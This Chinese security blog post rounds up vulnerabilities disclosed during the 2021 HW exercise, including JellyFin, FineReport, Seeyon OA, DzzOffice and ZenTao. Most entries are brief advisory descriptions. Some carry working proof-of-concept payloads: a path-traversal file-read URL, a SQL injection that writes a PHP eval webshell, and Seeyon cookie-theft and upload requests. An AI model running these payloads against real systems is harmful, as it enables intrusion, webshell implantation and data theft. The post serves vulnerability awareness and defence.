能力中心
本站所有文章均为原创,如需转载请注明出处
2021的HW已经开始,在这期间会有许多的漏洞被披露出来,在本文将进行持续更新。
JellyFin的Windows端服务器不会对特定路径进行鉴权,可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。
JellyFin <= 10.7.0
以下是漏洞复现结果。
可以通过访问
http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/
读取任意文件。
近日在网络上流传帆软的FineReport存在未认证的命令执行漏洞,经过官方的核实及测试,发现本漏洞并非0day,并不影响v10.0的版本。官方厂商已在去年发布相关修复。
FineReport < v10.0
https://forum.butian.net/share/57
由于服务端不会对上传的文件进行类型审查和权限审查,导致任意攻击者可以上传文件,严重可导致远程命令执行。
首先通过Upload/upload_file.php
上传文件,上传后的文件可以在l
参数的目录下找到。例如上图的请求,上传后的文件会被保存到Upload/1/asd.php
。
例如上图的请求,上传后的文件会被保存到Upload/1/asd.php
。
由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址,攻击者难以进行访问,且尽管可以访问也只能让幻阵执行ping指令,不会造成任何安全隐患。
https://mp.weixin.qq.com/s/LV460_N1-EsQUM8YhM5nuw
在Web登录界面且未登录的情况下会显示提示信息,并且会涉及用户组织,功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口,不存在漏洞。参考: https://forum.butian.net/share/58
可以让攻击者泄露服务端数据库,同时由于安装服务的用户极有可能拥有root权限,所以也可以进行webshell写入并达成命令执行。但本漏洞是内部一直问题,并且在2020年护网前的版本已经修复。
目前公开的PoC如下:
https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--
本段PoC将首先创建新的数据库表,后将数据库内容更名为webshell的目标名,最后删除表清理痕迹。
可通过访问
http://<ip>/seeyon/thirdpartyController.do.css/..;/ajax.do
来测试是否有漏洞,如漏洞存在,则会出现java.lang.NullPointerException:null
字样。
首先是通过精心构造的请求来获取到管理员的cookie,流出POC如下:
targeturl=orgurl+'seeyon/thirdpartyController.do'
post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'
request = SendRequest(targeturl,post)
response = request.send()
rsp = ""
if response and response.code == 200 and 'set-cookie' in str(response.headers).lower():
cookies = get_response_cookies(response.headers)
随后可以通过对目标路径发送POST请求和制作好的压缩文件即可达成文件上传。流出的PoC请求如下:
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded
managerMethod=validate&arguments=<请求数据>
若服务器没有返回“被迫下线”等字样,则证明上传成功。
https://planet.vulbox.com/detail/412
攻击者在通过恶意链接可以让WPS的内置浏览器进行沙箱逃逸和并令执行。请勿下载打开来路不明的WPS文件。
https://planet.vulbox.com/detail/421
攻击者可以通过把Exchange的认证绕过漏洞和权限提升漏洞结合在一起,完成对远程Exchange服务器的远程命令执行。详细信息将后续补充。
管理界面可以通过未授权访问,并且在管理界面里更改密码时不会对原密码进行检查,所以攻击者可以通过未授权访问管理界面,并且对管理员账号进行随意更改。
由于DzzOffice中一部分代码是抄自Discuz, 而Discuz中存在随机数问题。弱随机导致DzzOffice的authkey变量在理论上可以被爆破出来,但实际操作难度较大。获得authkey之后可以利用authkey对上传文件数据进行加密,而后可以向/core/api/wopi/index.php
发送POST请求和加密过后的文件数据进行文件上传。上传成功后可以访问上传的文件地址,并执行命令。
所有的漏洞都需要至少普通用户的权限。禅道采取了新的路径解析方法,具体解析方式为getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>
。而攻击者可以利用其中的一些过滤不当的API来进行SQL注入,文件读写最终可达成远程命令执行。
首先是SQL注入,在禅道的api-getModel-api-sql-sql
端点中,攻击者可以通过向本端点输入任意SQL语句从而达成SQL注入。
其次是文件读写,api-getModel-file-parseCSV-fileName
可以让攻击者读取任意文件。
api-getModel-editor-save-filePath
可以让攻击者通过发送POST请求上传任意文件。
而在本地运行禅道机器上可以找到相应文件。
https://www.jianshu.com/p/62bb128ecbdb
https://xz.aliyun.com/t/8066
3confident
2023/01/27 20:261incontrovertible
2022/09/02 20:16